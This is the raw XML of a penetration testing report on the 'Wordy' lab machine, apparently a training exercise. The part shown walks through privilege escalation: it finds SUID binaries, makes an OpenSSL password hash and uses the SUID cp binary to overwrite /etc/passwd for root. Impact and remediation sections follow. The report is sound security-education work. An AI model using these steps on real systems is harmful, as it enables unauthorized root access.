                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D903E61" w14:textId="0FD32FB4" w:rsidR="002F7043" w:rsidRDefault="002F131D" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F131D">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Step 12: -</w:t>
            </w:r>
            <w:r w:rsidR="002F7043" w:rsidRPr="002F7043">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>As soon as we gained the proper shell, we enumerated the machine for flags. We found flag1.txt in the /home/raj/ directory</w:t>
            </w:r>
            <w:r w:rsidR="002F7043">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47B449A9" w14:textId="5C5A43ED" w:rsidR="002F7043" w:rsidRPr="002F7043" w:rsidRDefault="002F7043" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F7043">
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FBD9971" wp14:editId="4EA99F8A">
                  <wp:extent cx="3063240" cy="1165860"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="14974821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3240" cy="116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16A701" w14:textId="7F56CC1C" w:rsidR="00916146" w:rsidRDefault="002F7043" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F7043">
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01DBC41B" wp14:editId="05D8E2ED">
                  <wp:extent cx="4389120" cy="5478780"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="75073482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120" cy="5478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9BD8B9" w14:textId="3FF05CFD" w:rsidR="002F131D" w:rsidRDefault="002F131D" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F131D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Step </w:t>
            </w:r>
            <w:r w:rsidR="00916146">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidRPr="002F131D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>: -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008A3FC5" w:rsidRPr="008A3FC5">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Now for privilege escalation, It is a regular practice to check for any file having SUID permissions with the help of “</w:t>
            </w:r>
            <w:r w:rsidR="008A3FC5" w:rsidRPr="008A3FC5">
              <w:rPr>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Find”</w:t>
            </w:r>
            <w:r w:rsidR="008A3FC5" w:rsidRPr="008A3FC5">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t> command. We used the following command to enumerate all binaries having SUID permissions</w:t>
            </w:r>
            <w:r w:rsidR="008A3FC5">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A584B3" w14:textId="45D5F611" w:rsidR="002F131D" w:rsidRDefault="002F131D" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F131D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>#find / -perm -u=s -type f 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FE2C4E2" w14:textId="3AA19C1E" w:rsidR="00916146" w:rsidRDefault="00916146" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00916146">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Find command shown that </w:t>
            </w:r>
            <w:r w:rsidRPr="00916146">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:r w:rsidRPr="00916146">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t> and </w:t>
            </w:r>
            <w:r w:rsidRPr="00916146">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:r w:rsidRPr="00916146">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t> command has the SUID permissions. This could be possible for escalating root privilege.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64E0A899" w14:textId="7FE8645C" w:rsidR="00916146" w:rsidRPr="00916146" w:rsidRDefault="00916146" w:rsidP="00916146">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00916146">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE5BF18" wp14:editId="598B5EA2">
                  <wp:extent cx="4160520" cy="3706091"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                  <wp:docPr id="36578388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6056" cy="3711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98B31" w14:textId="7C2FF01B" w:rsidR="00916146" w:rsidRPr="002F131D" w:rsidRDefault="00E77C67" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E77C67">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>SUID Binaries command gave us all the sensitive files that can be read/write and hence with the help of</w:t>
            </w:r>
            <w:r w:rsidRPr="00E77C67">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:r w:rsidRPr="00E77C67">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E77C67">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>command we can overwrite the</w:t>
            </w:r>
            <w:r w:rsidRPr="00E77C67">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> /etc/passwd.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79AC0D73" w14:textId="40B215B0" w:rsidR="00715DA4" w:rsidRPr="00715DA4" w:rsidRDefault="0081236A" w:rsidP="00715DA4">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081236A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0081236A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>14: -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00715DA4" w:rsidRPr="00715DA4">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Now we are creating the salt value of password for our new user and this will be done by using “</w:t>
            </w:r>
            <w:r w:rsidR="005C7422" w:rsidRPr="00715DA4">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>OpenSSL</w:t>
            </w:r>
            <w:r w:rsidR="00715DA4" w:rsidRPr="00715DA4">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>” following command as mentioned in the screenshot below:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="588CF760" w14:textId="2B947463" w:rsidR="00715DA4" w:rsidRDefault="0081236A" w:rsidP="00715DA4">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081236A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidR="00715DA4" w:rsidRPr="0081236A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">openssl passwd -1 -salt </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>coco</w:t>
            </w:r>
            <w:r w:rsidR="00715DA4" w:rsidRPr="0081236A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>hacker</w:t>
            </w:r>
            <w:r w:rsidR="00715DA4" w:rsidRPr="0081236A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>123</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30BE367B" w14:textId="503CC37A" w:rsidR="0081236A" w:rsidRPr="0081236A" w:rsidRDefault="0081236A" w:rsidP="0081236A">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081236A">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187DE4C6" wp14:editId="1BACADAB">
                  <wp:extent cx="4842163" cy="544195"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="4014557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0202" cy="545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E37479" w14:textId="37FA38F5" w:rsidR="0081236A" w:rsidRPr="005C7422" w:rsidRDefault="005C7422" w:rsidP="00715DA4">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 15: -</w:t>
            </w:r>
            <w:r w:rsidRPr="005C7422">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Now we will create passwd file in /var/tmp and save this hash password in it. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE408F2" w14:textId="13C55E2F" w:rsidR="005C7422" w:rsidRPr="005C7422" w:rsidRDefault="005C7422" w:rsidP="005C7422">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67814DE7" w14:textId="77777777" w:rsidR="005C7422" w:rsidRPr="0081236A" w:rsidRDefault="005C7422" w:rsidP="00715DA4">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DCEC1A0" w14:textId="520E6ED0" w:rsidR="005C7422" w:rsidRPr="005C7422" w:rsidRDefault="00FE275F" w:rsidP="005C7422">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE275F">
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EBE00F3" wp14:editId="3438679D">
                  <wp:extent cx="4959927" cy="3739515"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="315551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55151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802" cy="374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8FCDA" w14:textId="0C0B72F5" w:rsidR="00DA6495" w:rsidRDefault="005C7422" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C7422">
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Step 16: -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DA6495" w:rsidRPr="00DA6495">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Now we want to overwrite passwd file inside /etc folder to replace the original passwd file.</w:t>
            </w:r>
            <w:r w:rsidR="00DA6495" w:rsidRPr="00DA6495">
              <w:rPr>
                <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
                <w:color w:val="000000"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DA6495" w:rsidRPr="00DA6495">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">We can </w:t>
            </w:r>
            <w:r w:rsidR="00DA6495">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">use cp command </w:t>
            </w:r>
            <w:r w:rsidR="00DA6495" w:rsidRPr="00DA6495">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>which will overwrite the existing passwd file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A5C68AE" w14:textId="6CD00AE1" w:rsidR="00DA6495" w:rsidRDefault="00FE275F" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE275F">
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="043E4677" wp14:editId="6421E5EC">
                  <wp:extent cx="4359018" cy="205758"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
                  <wp:docPr id="839774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77403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018" cy="20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13A7B" w14:textId="3D4968D9" w:rsidR="00FE275F" w:rsidRPr="00DA6495" w:rsidRDefault="00FE275F" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE275F">
              <w:rPr>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4448332F" wp14:editId="3FCE0FAC">
                  <wp:extent cx="4965505" cy="3075709"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="0"/>
                  <wp:docPr id="1274699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69956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227" cy="3094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3AFC3" w14:textId="77777777" w:rsidR="00FE275F" w:rsidRDefault="00FE275F" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Step 17: -</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FE275F">
              <w:rPr>
                <w:bCs/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>We will attempt to change the user to Snowbunny after overwriting the /etc/passwd in order to gain access to root privileges.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62C9F924" w14:textId="77777777" w:rsidR="00FE275F" w:rsidRDefault="00FE275F" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278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BOOM!!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A6DDAC" w14:textId="22F2D240" w:rsidR="00FE275F" w:rsidRPr="00FE275F" w:rsidRDefault="00FE275F" w:rsidP="00FE275F">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE275F">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6647A58C" wp14:editId="7E97DC7E">
                  <wp:extent cx="4732020" cy="1005840"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                  <wp:docPr id="204275037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202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6785B2" w14:textId="56E1A513" w:rsidR="003D6500" w:rsidRPr="003D6500" w:rsidRDefault="003D6500" w:rsidP="003D6500">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D6500">
              <w:rPr>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1089C56C" wp14:editId="1C460293">
                  <wp:extent cx="4904509" cy="2186940"/>
                  <wp:effectExtent l="0" t="0" r="0" b="3810"/>
                  <wp:docPr id="90849134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2543" cy="2190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C805C" w14:textId="7AD9CC91" w:rsidR="003D6500" w:rsidRPr="003D6500" w:rsidRDefault="003D6500" w:rsidP="003D6500">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A138FCA" w14:textId="42C45938" w:rsidR="00FE275F" w:rsidRPr="00FE275F" w:rsidRDefault="00FE275F" w:rsidP="002F7043">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B120D" w:rsidRPr="00FD6D45" w14:paraId="00EC1455" w14:textId="77777777" w:rsidTr="003D6500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5449" w14:textId="23AA428D" w:rsidR="004B120D" w:rsidRPr="00FD6D45" w:rsidRDefault="004B120D" w:rsidP="004B120D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I</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD6D45">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>mpact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218F" w14:textId="77777777" w:rsidR="004B120D" w:rsidRPr="00EB6C90" w:rsidRDefault="00EB6C90" w:rsidP="00EB6C90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EB6C90">
              <w:t>An attacker can upload a malicious PHP web shell and execute arbitrary commands on the server.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="343C911D" w14:textId="0685E113" w:rsidR="00EB6C90" w:rsidRPr="00EB6C90" w:rsidRDefault="00EB6C90" w:rsidP="00EB6C90">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB6C90">
              <w:t xml:space="preserve">The attacker can obtain a reverse shell and gain unauthorized access to the system. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="468E1175" w14:textId="77777777" w:rsidR="00EB6C90" w:rsidRPr="00EB6C90" w:rsidRDefault="00EB6C90" w:rsidP="00EB6C90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EB6C90">
              <w:t>Misconfigured SUID binaries can allow privilege escalation to root.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="003D1065" w14:textId="77777777" w:rsidR="00EB6C90" w:rsidRPr="00EB6C90" w:rsidRDefault="00EB6C90" w:rsidP="00EB6C90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EB6C90">
              <w:t>Full system compromise may result, affecting the confidentiality, integrity, and availability of the server.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7D4C7D" w14:textId="246414D9" w:rsidR="00EB6C90" w:rsidRPr="00EB6C90" w:rsidRDefault="00EB6C90" w:rsidP="00EB6C90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EB6C90">
              <w:t>Sensitive files and user data may be viewed, modified, or deleted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B120D" w:rsidRPr="00FD6D45" w14:paraId="3D4E5735" w14:textId="77777777" w:rsidTr="003D6500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DEC97" w14:textId="77777777" w:rsidR="004B120D" w:rsidRPr="00FD6D45" w:rsidRDefault="004B120D" w:rsidP="004B120D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t>Remediation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2938A" w14:textId="6F479DAC" w:rsidR="004B120D" w:rsidRPr="004B120D" w:rsidRDefault="004B120D" w:rsidP="004B120D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 w:rsidRPr="004B120D">
              <w:t>Update the vulnerable WordPress plugin to the latest secure version or remove it if no longer needed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CBA1142" w14:textId="2EFA5F23" w:rsidR="004B120D" w:rsidRPr="004B120D" w:rsidRDefault="004B120D" w:rsidP="004B120D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 w:rsidRPr="004B120D">
              <w:t>Apply the principle of least privilege by removing unnecessary SUID permissions from binaries such as cp and wget.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35FCC810" w14:textId="2E7DCDC3" w:rsidR="004B120D" w:rsidRPr="004B120D" w:rsidRDefault="004B120D" w:rsidP="004B120D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 w:rsidRPr="004B120D">
              <w:t>Restrict file uploads to trusted users only.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BD30D72" w14:textId="403CC171" w:rsidR="004B120D" w:rsidRPr="004B120D" w:rsidRDefault="004B120D" w:rsidP="004B120D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 w:rsidRPr="004B120D">
              <w:t>Block execution of PHP and other executable files inside upload directories.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B808EB8" w14:textId="77777777" w:rsidR="002C1770" w:rsidRPr="002C1770" w:rsidRDefault="004B120D" w:rsidP="004B120D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 w:rsidRPr="004B120D">
              <w:t xml:space="preserve">Regularly update WordPress, themes, plugins, and the operating system. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18ED24A7" w14:textId="6698B5BA" w:rsidR="004B120D" w:rsidRPr="004B120D" w:rsidRDefault="004B120D" w:rsidP="004B120D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 w:rsidRPr="004B120D">
              <w:lastRenderedPageBreak/>
              <w:t>Monitor server logs and deploy a Web Application Firewall (WAF) to detect malicious upload attempts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E03B44" w14:textId="033E3F63" w:rsidR="004B120D" w:rsidRPr="00FD6D45" w:rsidRDefault="004B120D" w:rsidP="004B120D">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B120D" w:rsidRPr="00FD6D45" w14:paraId="55DFC6AC" w14:textId="77777777" w:rsidTr="003D6500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BA0A" w14:textId="77777777" w:rsidR="004B120D" w:rsidRPr="00FD6D45" w:rsidRDefault="004B120D" w:rsidP="004B120D">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD6D45">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">References </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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6132" w14:textId="42B8577A" w:rsidR="00074908" w:rsidRDefault="00074908" w:rsidP="00074908">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>GTFOBins – https://gtfobins.org/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40E1CC5D" w14:textId="3542519A" w:rsidR="00074908" w:rsidRDefault="00074908" w:rsidP="00074908">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>WordPress Security – https://wordpress.org/about/security/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF3DFDB" w14:textId="3169D0F2" w:rsidR="00766E25" w:rsidRPr="00766E25" w:rsidRDefault="00074908" w:rsidP="00074908">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>OWASP File Upload Cheat Sheet – https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04D5A6E7" w14:textId="77777777" w:rsidR="00FD6D45" w:rsidRPr="00FD6D45" w:rsidRDefault="00FD6D45" w:rsidP="00FD6D45">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FAC79E5" w14:textId="77777777" w:rsidR="008E6A6C" w:rsidRDefault="008E6A6C"/>
    <w:sectPr w:rsidR="008E6A6C">
      <w:headerReference w:type="default" r:id="rId43"/>
      <w:footerReference w:type="default" r:id="rId4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B96FD" w14:textId="77777777" w:rsidR="00426D1B" w:rsidRDefault="00426D1B" w:rsidP="00FD6D45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="489706F9" w14:textId="77777777" w:rsidR="00426D1B" w:rsidRDefault="00426D1B" w:rsidP="00FD6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osefin Sans">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00000FF" w:usb1="4000204B" w:usb2="00000000" w:usb3="00000000" w:csb0="00000193" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Mul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FD6D45" w14:paraId="6AB5A577" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2500" w:type="pct"/>
          <w:shd w:val="clear" w:color="auto" w:fill="156082" w:themeFill="accent1"/>
          <w:vAlign w:val="center"/>
        </w:tcPr>
        <w:p w14:paraId="271D24B2" w14:textId="3FCC07CC" w:rsidR="00FD6D45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217CBD3CE85D447D8A3697FBA53DE47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C2084A">
                <w:rPr>
                  <w:caps/>
                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>penetration testing report - ha Wordy</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="2500" w:type="pct"/>
          <w:shd w:val="clear" w:color="auto" w:fill="156082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84FAAAFB883F4EE09177432BD3C6E52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4159303" w14:textId="11AB9159" w:rsidR="00FD6D45" w:rsidRDefault="00FD6D45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Sufiyan Shaikh</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="7517C384" w14:textId="77777777" w:rsidR="00FD6D45" w:rsidRDefault="00FD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23AD3" w14:textId="77777777" w:rsidR="00426D1B" w:rsidRDefault="00426D1B" w:rsidP="00FD6D45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3AB1ACDF" w14:textId="77777777" w:rsidR="00426D1B" w:rsidRDefault="00426D1B" w:rsidP="00FD6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7A5CF" w14:textId="2910FE0C" w:rsidR="00FD6D45" w:rsidRDefault="00FD6D4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8A4128C" wp14:editId="396859E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4A913AF" w14:textId="20A5A075" w:rsidR="00FD6D45" w:rsidRDefault="00FD6D4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penetration testing report - ha </w:t>
